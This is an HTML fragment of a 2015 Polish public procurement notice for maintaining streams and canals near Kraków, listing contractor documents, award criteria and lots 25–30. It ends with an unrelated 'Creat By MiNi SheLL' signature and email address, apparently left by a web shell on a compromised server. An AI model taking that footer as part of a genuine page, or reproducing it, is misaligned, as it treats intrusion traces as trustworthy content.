<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony Formularz Oferty 2. Dokument ustanawiający Pełnomocnika do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego - w przypadku, gdy Wykonawcy składają wspólną ofertę, 3. Stosowne pełnomocnictwo(a) potwierdzające, że dana osoba nie wymieniona w dokumencie rejestracyjnym prowadzonej działalności jest upoważniona do reprezentowania wykonawcy w postępowaniu. 6. Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia w sytuacji polegania przez Wykonawcę na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów 6.1. oświadczenie innego podmiotu o braku podstaw do wykluczenia z postępowania z powodu nie spełniania warunków, o których mowa w art. 24 ust. 1 Ustawy, zgodnie z drukiem stanowiącym załącznik do SIWZ; 6.2.dla weryfikacji osoby (reprezentacji) innego podmiotu podpisującej zobowiązanie aktualny odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 9.kosztorys ofertowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - warunki płatności - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia umowy mogą być dokonywane wyłącznie w formie pisemnego aneksu, podpisanego przez obie strony. 2. Z zastrzeżeniem formy przewidzianej w ust.1, Strony dopuszczają możliwość zmiany treści umowy w następującym zakresie: a). zmiany w KRS, wpisie do ewidencji działalności gospodarczej lub (CEIDG) w trakcie realizacji zamówienia. b). zmiany kont bankowych, c). wystąpienie oczywistych omyłek pisarskich i rachunkowych w treści umowy. d) w przypadku ustawowej zmiany stawki podatku od towarów i usług na przedmiot umowy, cena brutto określona w umowie ulegnie odpowiedniej zmianie, przy czym cena netto pozostanie niezmieniona e). obniżenia wynagrodzenia, o którym mowa §3 ust.1, f). zmiany terminu wykonania umowy z zastrzeżeniem ust.3 3. Zmiana terminów wykonania przedmiotu zamówienia będzie możliwa wyłącznie w przypadku zdarzeń losowych tj. podtopienia terenu robót, spowodowanego powodzią lub intensywnymi opadami deszczu tylko jeśli uniemożliwia to prowadzenie robót, bądź też wystąpienia innych okoliczności niezależnych od wykonawcy i udokumentowanych w formie pisemnej a mających wpływ na termin realizacji przedmiotu umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzmiuw.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MZMiUW Inspektorat Rejonowy w Krakowie ul.Kraszewskiego 36 30-110 Kraków pokój 32A..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.07.2015 godzina 08:00, miejsce: MZMiUW Inspektorat Rejonowy w Krakowie ul.Kraszewskiego 36 30-110 Kraków pokój 32A..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Konserwacja potoku Rudno w km 0+880-0+900 - 0,02km uregulowany,              
m. Czernichów, gm. Czernichów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> konserwacja bieżąca.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.34.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. warunki płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Konserwacja bieżąca na potoku Gnojski w km 0+500-2+100 t.j. 1,60km, nieuregulowany w m. Książnice i Cichawa, gm. Gdów, pow. Wieliczka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> konserwacja bieżąca.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.34.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. warunki płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> 1.Konserwacja rz. Centara w km 10+400 - 12+200, ureg. w m. Łobzów, gm. Wolbrom, pow. olkuski
2. Konserwacja pot. Szklarka w km 3+900 - 3+950, nieureg. w m. Szklary, gm. Jerzmanowice-Przeginia, pow. krakowski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> konserwacja bieżąca.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.34.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. warunki płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Konserwacja potoku Kostrzeckiego uregulowany w km 0+000-6+100
 - miasto Kraków , gm. Kraków , pow. Kraków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> konserwacja bieżąca.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. warunki płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> ,Konserwacja potoku IGOŁOMSKIEGO w km 0+000  ÷ 5+313 (uregulowany) w m. Złotniki, Igołomia, Zofipole, gm. Igołomia-Wawrzeńczyce.
 (Rozmiar 5,313 km)
2.Konserwacja kanału nr 2  w km 0+000  ÷ 1+100 (1,1 km) w m. Złotniki, 
gm. Igołomia-Wawrzeńczyce- uregulowany.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> konserwacja bieżąca.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.34.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. warunki płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> 1.Konserwacja potoku Tropiszowskiego w km 2+400 ÷ 8+950 (6,550 km)
w m. Odwiśle, Igołomia, Tropiszów,  Zofipole, gm. Igołomia-Wawrzeńczyce.
 - uregulowany 
2. Konserwacja kanału nr 3  w km 0+000  ÷ 0+720 ( 0,72 km) w m. Koźlica, gm. Igołomia-Wawrzeńczyce- uregulowany.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> konserwacja bieżąca.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.34.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. warunki płatności - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com